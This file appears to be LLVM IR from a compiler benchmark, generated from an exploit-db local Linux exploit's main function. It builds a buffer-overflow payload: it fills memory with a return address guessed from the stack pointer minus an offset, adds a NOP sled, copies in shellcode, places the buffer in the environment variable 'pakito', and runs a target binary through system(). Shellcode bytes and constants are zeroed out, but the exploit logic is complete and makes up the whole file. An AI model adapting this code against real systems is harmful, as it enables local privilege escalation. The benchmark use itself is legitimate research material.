; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_20411.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_20411.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@DEFAULT_OFFSET = common dso_local global i32 0, align 4
@DEFAULT_BUFFER_SIZE = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [26 x i8] c"Use ./cmctl_start Offset\0A\00", align 1
@NOP = common dso_local global i8 0, align 1
@shellcode = common dso_local global i32* null, align 8
@.str.1 = private unnamed_addr constant [7 x i8] c"pakito\00", align 1
@BINARY = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i8*, align 8
  %7 = alloca i8*, align 8
  %8 = alloca [3 x i8*], align 16
  %9 = alloca [100 x i8], align 16
  %10 = alloca [120 x i8], align 16
  %11 = alloca i64*, align 8
  %12 = alloca i64, align 8
  %13 = alloca i32, align 4
  %14 = alloca i32, align 4
  %15 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %16 = load i32, i32* @DEFAULT_OFFSET, align 4
  store i32 %16, i32* %13, align 4
  %17 = load i32, i32* @DEFAULT_BUFFER_SIZE, align 4
  store i32 %17, i32* %14, align 4
  %18 = load i32, i32* %4, align 4
  %19 = icmp sgt i32 %18, 1
  br i1 %19, label %20, label %25

20:                                               ; preds = %2
  %21 = load i8**, i8*** %5, align 8
  %22 = getelementptr inbounds i8*, i8** %21, i64 1
  %23 = load i8*, i8** %22, align 8
  %24 = call i32 @atoi(i8* %23)
  store i32 %24, i32* %13, align 4
  br label %28

25:                                               ; preds = %2
  %26 = call i32 @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str, i64 0, i64 0))
  %27 = call i32 @exit(i32 1) #3
  unreachable

28:                                               ; preds = %20
  %29 = load i32, i32* %14, align 4
  %30 = call i8* @malloc(i32 %29)
  store i8* %30, i8** %6, align 8
  %31 = call i32 (...) @get_sp()
  %32 = load i32, i32* %13, align 4
  %33 = sub nsw i32 %31, %32
  %34 = sext i32 %33 to i64
  store i64 %34, i64* %12, align 8
  %35 = load i8*, i8** %6, align 8
  store i8* %35, i8** %7, align 8
  %36 = load i8*, i8** %7, align 8
  %37 = bitcast i8* %36 to i64*
  store i64* %37, i64** %11, align 8
  store i32 0, i32* %15, align 4
  br label %38

38:                                               ; preds = %46, %28
  %39 = load i32, i32* %15, align 4
  %40 = load i32, i32* %14, align 4
  %41 = icmp slt i32 %39, %40
  br i1 %41, label %42, label %49

42:                                               ; preds = %38
  %43 = load i64, i64* %12, align 8
  %44 = load i64*, i64** %11, align 8
  %45 = getelementptr inbounds i64, i64* %44, i32 1
  store i64* %45, i64** %11, align 8
  store i64 %43, i64* %44, align 8
  br label %46

46:                                               ; preds = %42
  %47 = load i32, i32* %15, align 4
  %48 = add nsw i32 %47, 4
  store i32 %48, i32* %15, align 4
  br label %38

49:                                               ; preds = %38
  store i32 0, i32* %15, align 4
  br label %50

50:                                               ; preds = %61, %49
  %51 = load i32, i32* %15, align 4
  %52 = load i32, i32* %14, align 4
  %53 = sdiv i32 %52, 2
  %54 = icmp slt i32 %51, %53
  br i1 %54, label %55, label %64

55:                                               ; preds = %50
  %56 = load i8, i8* @NOP, align 1
  %57 = load i8*, i8** %6, align 8
  %58 = load i32, i32* %15, align 4
  %59 = sext i32 %58 to i64
  %60 = getelementptr inbounds i8, i8* %57, i64 %59
  store i8 %56, i8* %60, align 1
  br label %61

61:                                               ; preds = %55
  %62 = load i32, i32* %15, align 4
  %63 = add nsw i32 %62, 1
  store i32 %63, i32* %15, align 4
  br label %50

64:                                               ; preds = %50
  %65 = load i8*, i8** %6, align 8
  %66 = load i32, i32* %14, align 4
  %67 = sdiv i32 %66, 2
  %68 = load i32*, i32** @shellcode, align 8
  %69 = call i32 @strlen(i32* %68)
  %70 = sdiv i32 %69, 2
  %71 = sub nsw i32 %67, %70
  %72 = sext i32 %71 to i64
  %73 = getelementptr inbounds i8, i8* %65, i64 %72
  store i8* %73, i8** %7, align 8
  store i32 0, i32* %15, align 4
  br label %74

74:                                               ; preds = %88, %64
  %75 = load i32, i32* %15, align 4
  %76 = load i32*, i32** @shellcode, align 8
  %77 = call i32 @strlen(i32* %76)
  %78 = icmp slt i32 %75, %77
  br i1 %78, label %79, label %91

79:                                               ; preds = %74
  %80 = load i32*, i32** @shellcode, align 8
  %81 = load i32, i32* %15, align 4
  %82 = sext i32 %81 to i64
  %83 = getelementptr inbounds i32, i32* %80, i64 %82
  %84 = load i32, i32* %83, align 4
  %85 = trunc i32 %84 to i8
  %86 = load i8*, i8** %7, align 8
  %87 = getelementptr inbounds i8, i8* %86, i32 1
  store i8* %87, i8** %7, align 8
  store i8 %85, i8* %86, align 1
  br label %88

88:                                               ; preds = %79
  %89 = load i32, i32* %15, align 4
  %90 = add nsw i32 %89, 1
  store i32 %90, i32* %15, align 4
  br label %74

91:                                               ; preds = %74
  %92 = load i8*, i8** %6, align 8
  %93 = load i32, i32* %14, align 4
  %94 = sub nsw i32 %93, 1
  %95 = sext i32 %94 to i64
  %96 = getelementptr inbounds i8, i8* %92, i64 %95
  store i8 0, i8* %96, align 1
  %97 = load i8*, i8** %6, align 8
  %98 = call i32 @setenv(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i64 0, i64 0), i8* %97, i32 1)
  %99 = load i32, i32* @BINARY, align 4
  %100 = call i32 @system(i32 %99)
  %101 = load i32, i32* %3, align 4
  ret i32 %101
}

declare dso_local i32 @atoi(i8*) #1

declare dso_local i32 @printf(i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i8* @malloc(i32) #1

declare dso_local i32 @get_sp(...) #1

declare dso_local i32 @strlen(i32*) #1

declare dso_local i32 @setenv(i8*, i8*, i32) #1

declare dso_local i32 @system(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
